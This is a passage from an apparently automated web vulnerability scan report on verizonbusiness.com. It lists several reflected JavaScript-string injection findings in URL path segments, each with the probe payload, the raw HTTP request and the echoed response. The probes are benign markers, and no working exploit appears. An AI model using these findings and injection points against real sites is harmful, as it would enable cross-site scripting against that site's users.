Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:19 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43399
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
i="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it/caas/security.xmlc375e";c1272064ae";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.106. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46f28'%3b850340af03e was submitted in the REST URL parameter 5. This input was echoed as 46f28';850340af03e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it/caas/security.xml46f28'%3b850340af03e HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:52 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43401
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-it/caas/security.xml46f28';850340af03e'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.107. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/cloud-storage/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65102"%3b0d10cd9898b was submitted in the REST URL parameter 1. This input was echoed as 65102";0d10cd9898b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products65102"%3b0d10cd9898b/it/cloud-it/cloud-storage/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Date: Wed, 17 Nov 2010 00:40:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products65102";0d10cd9898b/it/cloud-it/cloud-storage/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIM
...[SNIP]...

1.108. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/cloud-storage/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80e28'%3b8a2c735c25c was submitted in the REST URL parameter 1. This input was echoed as 80e28';8a2c735c25c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products80e28'%3b8a2c735c25c/it/cloud-it/cloud-storage/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Date: Wed, 17 Nov 2010 00:40:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products80e28';8a2c735c25c/it/cloud-it/cloud-storage/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.109. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/cloud-storage/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74e15'%3bddd3fbc10ba was submitted in the REST URL parameter 2. This input was echoed as 74e15';ddd3fbc10ba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it74e15'%3bddd3fbc10ba/cloud-it/cloud-storage/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:01 GMT
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it74e15';ddd3fbc10ba/cloud-it/cloud-storage/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.110. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/cloud-storage/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1cff"%3b7d3ead31ee8 was submitted in the REST URL parameter 2. This input was echoed as c1cff";7d3ead31ee8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/itc1cff"%3b7d3ead31ee8/cloud-it/cloud-storage/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42333
Date: Wed, 17 Nov 2010 00:40:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/itc1cff";7d3ead31ee8/cloud-it/cloud-storage/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.111. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/cloud-storage/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dc65'%3b5791e124a87 was submitted in the REST URL parameter 3. This input was echoed as 7dc65';5791e124a87 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it7dc65'%3b5791e124a87/cloud-storage/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-it7dc65';5791e124a87/cloud-storage/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.112. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/cloud-storage/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cb77"%3b76d009414d5 was submitted in the REST URL parameter 3. This input was echoed as 8cb77";76d009414d5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it8cb77"%3b76d009414d5/cloud-storage/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:41:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42333
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it8cb77";76d009414d5/cloud-storage/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.113. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/cloud-storage/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ca8e"%3b1e2eb5fb679 was submitted in the REST URL parameter 4. This input was echoed as 3ca8e";1e2eb5fb679 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it/cloud-storage3ca8e"%3b1e2eb5fb679/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:41:37 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43403
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
bx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it/cloud-storage3ca8e";1e2eb5fb679/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.114. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/cloud-storage/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b898e'%3be2aaa764a2 was submitted in the REST URL parameter 4. This input was echoed as b898e';e2aaa764a2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it/cloud-storageb898e'%3be2aaa764a2/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43401
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-it/cloud-storageb898e';e2aaa764a2/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.115. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/data-center/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3da56'%3b60c3c334ea2 was submitted in the REST URL parameter 1. This input was echoed as 3da56';60c3c334ea2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products3da56'%3b60c3c334ea2/it/data-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:03 GMT
Content-Type: text/html
Content-Length: 40646
Date: Wed, 17 Nov 2010 00:40:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products3da56';60c3c334ea2/it/data-center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.116. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/data-center/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b813a"%3b4dc7946af8a was submitted in the REST URL parameter 1. This input was echoed as b813a";4dc7946af8a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsb813a"%3b4dc7946af8a/it/data-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:43 GMT
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsb813a";4dc7946af8a/it/data-center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.117. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/data-center/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf2b3'%3be822fdb00ab was submitted in the REST URL parameter 2. This input was echoed as cf2b3';e822fdb00ab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/itcf2b3'%3be822fdb00ab/data-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:36 GMT
Content-Type: text/html
Content-Length: 42313
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/itcf2b3';e822fdb00ab/data-center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.118. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/data-center/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba539"%3bf452eb4f7f1 was submitted in the REST URL parameter 2. This input was echoed as ba539";f452eb4f7f1 in the application's response.

